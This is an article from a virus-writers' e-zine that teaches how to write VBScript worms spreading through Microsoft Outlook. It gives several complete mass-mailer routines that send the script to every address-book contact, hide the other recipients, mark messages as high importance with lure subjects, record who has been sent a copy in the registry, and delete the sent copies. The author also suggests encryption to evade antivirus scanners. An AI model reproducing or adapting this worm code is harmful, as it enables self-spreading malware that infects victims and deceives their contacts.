rRlf #3

The Revoluti0n
last article	table of contents	next article
Some VBScript Outlook-worm techniques by Zed
Most VBScript worms these days spread using Microsoft outlook.
The outlook mass-emailing code is one of the best ways for your
worm to spread, but this code is easily detected, so I recommend
modifying it a little :)

Here is a very basic code that emails all of the contacts located
in the address book (This is called a mass-mailer).

-----------------------------------------------------------------

Set OutlookApp = CreateObject("Outlook.Application")
If Not OutlookApp = "" Then
Set GNS = OutlookApp.GetNameSpace("MAPI")
For SearchList = 1 To GNS.AddressLists.Count
CountLoop = 1
Set OutlookEmail = OutlookApp.CreateItem(0)
For SearchEmails = 1 To GNS.AddressLists(SearchList).AddressEntries.Count
OutlookEmail.Recipients.Add GNS.AddressLists(SearchList).AddressEntries(CountLoop)
CountLoop = CountLoop + 1
Next
OutlookEmail.Subject = "Check this out!"
OutlookEmail.Body = "Look at the file in the attachments, It's great! :P"
OutlookEmail.Attachments.Add WScript.ScriptFullName
OutlookEmail.DeleteAfterSubmit = True
OutlookEmail.Send
Next
End If

-----------------------------------------------------------------

Of course, this little code should be detected by any now-day virus scanner, so there is a
obvious problem in the detection of this code - so try methods like encryption, and alike :)

But this code above is just a basic mass-mailer, and is not very efficient, becase it shows all
of the people that it has emailed itself to in the message (for example, the worm finds Bob in
the address book, and emails him the worm. Lets just say that Bobs' email
address was Bob@Smtpserv.com.au, and the code above was used as the worms mass-mail component.
When Bob reads the worms email, The "To:" coloumn in the email will be filled with other peoples
email addresses that were taken from the victims address book, thus, the email will look
something like this:

-----------------------------------------------------------------

To: contact@Freepcs.com; anothercontact@Homeweb.net; contact2@stuff021709.com;
    Bob@Smtpserv.com.au; Jimmy349234@Yahoopages.com; Email323@Smtpserv.com.au;

Subject: Check this out!

-----------------------------------------------------------------

So as you see, other emails that were taken from the address book can be seen in the email,
which is pretty crap because people will know that the email was sent to other people besides
themselves. So why not stop this? I mean, there is a way to "hide" these other emails so that
they do not appear in the sent email messages.
Here is the code on how to do this:

-----------------------------------------------------------------

On Error Resume Next
Set OutlookApp = CreateObject("Outlook.Application")
If Not OutlookApp = "" Then
For Each ContactSwitch In OutlookApp.GetNameSpace("MAPI").AddressLists
For UserGroup = 1 To ContactSwitch.AddressEntries.Count
Set OutlookEmail = OutlookApp.CreateItem(0)
OutlookEmail.Recipients.Add ContactSwitch.AddressEntries(UserGroup)
OutlookEmail.Subject = "Check this out!"
OutlookEmail.Body = "Look at the file in the attachments, It's great! :P"
OutlookEmail.Attachments.Add WScript.ScriptFullName
OutlookEmail.DeleteAfterSubmit = True
OutlookEmail.Send
Next
Next
End If

-----------------------------------------------------------------

So as I said before, this code is far more effective for mass-mailing because it doesn't show
the other contacts it has emailed itself to. For example, if Sarah had a VBScript worm using
this email routine above, and she was silly enough to open it, and it went through her Outlook
address book and found and sent itself to the following emails:

Bob@Smtpserv.com.au
John@Email143534.com
James@Squarebobspongepants.net
Graham@Squarebobspongepants.net
Tony@Squarebobspongepants.net
Jessica@Free_Email546456.com


The email would look like this to any of the people that the worm sent itself to:

-----------------------------------------------------------------

To: 
Subject: Check this out!

-----------------------------------------------------------------

Hehehe... the user who reads this email does not know that this message was sent to lots of
other people, instead, this email looks like it was just send to this person only.

Tehehe... I'm not finnished yet! there are some more tricks that I stumbled accross, the next
one that I'm going to explain is email importance. In Outlook, there is a thing called
"Email Importance", which basically means that you can set the importance of the email that you
are sending. An email that is recieved with a high importance would have a "[!]" mark on the
left side of the email... Which just says that the email is important :)

Here is a description for email importance codes:

-----------------------------------------------------------------

OutlookEmail.Importance = 2		' High importance :)
OutlookEmail.Importance = 1		' Normal (default) importance
OutlookEmail.Importance = 0		' Low importance

-----------------------------------------------------------------

So my point is, by adding the high-importance code to the mass-mailing routine, all of the
worms sent emails will be sent with high importance, thus some people will be tricked into
thinking the email is important.
Here is an mass-mail code that uses the importance thingo:

-----------------------------------------------------------------

On Error Resume Next
Set OutlookApp = CreateObject("Outlook.Application")
If Not OutlookApp = "" Then
For Each ContactSwitch In OutlookApp.GetNameSpace("MAPI").AddressLists
For UserGroup = 1 To ContactSwitch.AddressEntries.Count
Set OutlookEmail = OutlookApp.CreateItem(0)
OutlookEmail.Recipients.Add ContactSwitch.AddressEntries(UserGroup)
OutlookEmail.Subject = "IMPORTANT!!!"
OutlookEmail.Body = "This file is important and should be opened now."
OutlookEmail.Attachments.Add WScript.ScriptFullName
OutlookEmail.Importance = 2
OutlookEmail.DeleteAfterSubmit = True
OutlookEmail.Send
Next
Next
End If

-----------------------------------------------------------------

Hehehe... so all emails sent by the code above would look like this to the email recipient(s):

-----------------------------------------------------------------

To: 
Subject: [!] IMPORTANT!!!

-----------------------------------------------------------------

Marvelous... so now you should know a bit about email importance... There is just another
problem with using all of the codes that I have shown you so far... The problem is that whenever
the worm is executed (opened), it will email itself again, and it will always email itself
whenever it is executed... So the people in the address book will be "spammed" with the same
email message over and over again. There is a way to stop this, and only lets the worm email
itself once to every user in the address book.
Here is the code on how to do this:

-----------------------------------------------------------------

On Error Resume Next
Set wsc = CreateObject("WScript.Shell")
Set OutlookApp = CreateObject("Outlook.Application")
If Not OutlookApp = "" Then
For Each ContactSwitch In OutlookApp.GetNameSpace("MAPI").AddressLists
For UserGroup = 1 To ContactSwitch.AddressEntries.Count
EmailKey = "HKEY_CURRENT_USER\Software\VBSWorm\RecordContacts\"
ReadIfSent = wsc.RegRead(EmailKey & ContactSwitch.AddressEntries(UserGroup))
If ReadIfSent <> "Email Sent" Then
Set OutlookEmail = OutlookApp.CreateItem(0)
OutlookEmail.Recipients.Add ContactSwitch.AddressEntries(UserGroup)
OutlookEmail.Subject = "IMPORTANT!!!"
OutlookEmail.Body = "This file is important and should be opened now."
OutlookEmail.Attachments.Add WScript.ScriptFullName
OutlookEmail.Importance = 2
OutlookEmail.DeleteAfterSubmit = True
OutlookEmail.Send
wsc.RegWrite EmailKey & ContactSwitch.AddressEntries(UserGroup), "Email Sent"
End If
Next
Next
End If

-----------------------------------------------------------------

Tehehe... This code is really the same as the previous one that uses importance, but it will
only send the emails once to everyone in the address book, because the worm keeps a "Record"
of who it has sent itself to.
There is just one more thing about mass-mailing that I will show you before I go. I am going
to explain how to make the worm email itself to only a certain number of contacts in the address
book.
Here is a code that will email itself to the first 999 people in the address book.
Also note that it doesn't matter that if the user doesn't have 999 contacts... It just means
that the worm will email itself to a maximum of 999 people :)
Anyway, here is the code:

-----------------------------------------------------------------

On Error Resume Next
Set OutlookApp = CreateObject("Outlook.Application")
If Not OutlookApp = "" Then
Set GNS = OutlookApp.GetNameSpace("MAPI")
For List1 = 1 To GNS.AddressLists.Count
CountLoop = 1
For ListCount = 1 To GNS.AddressLists(List1).AddressEntries.Count
If CountLoop > 999 Then
ListCount = GNS.AddressLists(List1).AddressEntries.Count
End If
Set OutlookEmail = OutlookApp.CreateItem(0)
OutlookEmail.Recipients.Add GNS.AddressLists(List1).AddressEntries(CountLoop)
OutlookEmail.Subject = "Hello"
OutlookEmail.Body = "Look at the attachments!"
OutlookEmail.Attachments.Add WScript.ScriptFullName
OutlookEmail.DeleteAfterSubmit = True
OutlookEmail.Send
CountLoop = CountLoop + 1
Next
Next
End If

-----------------------------------------------------------------

Hehehe... So this code above will email itself to a maximum of 999 email addresses that are
found in the Outlook address book.


Well, thats just about all I can think of for Outlook worm codes :)
If you have any questions or whatever, you can email me.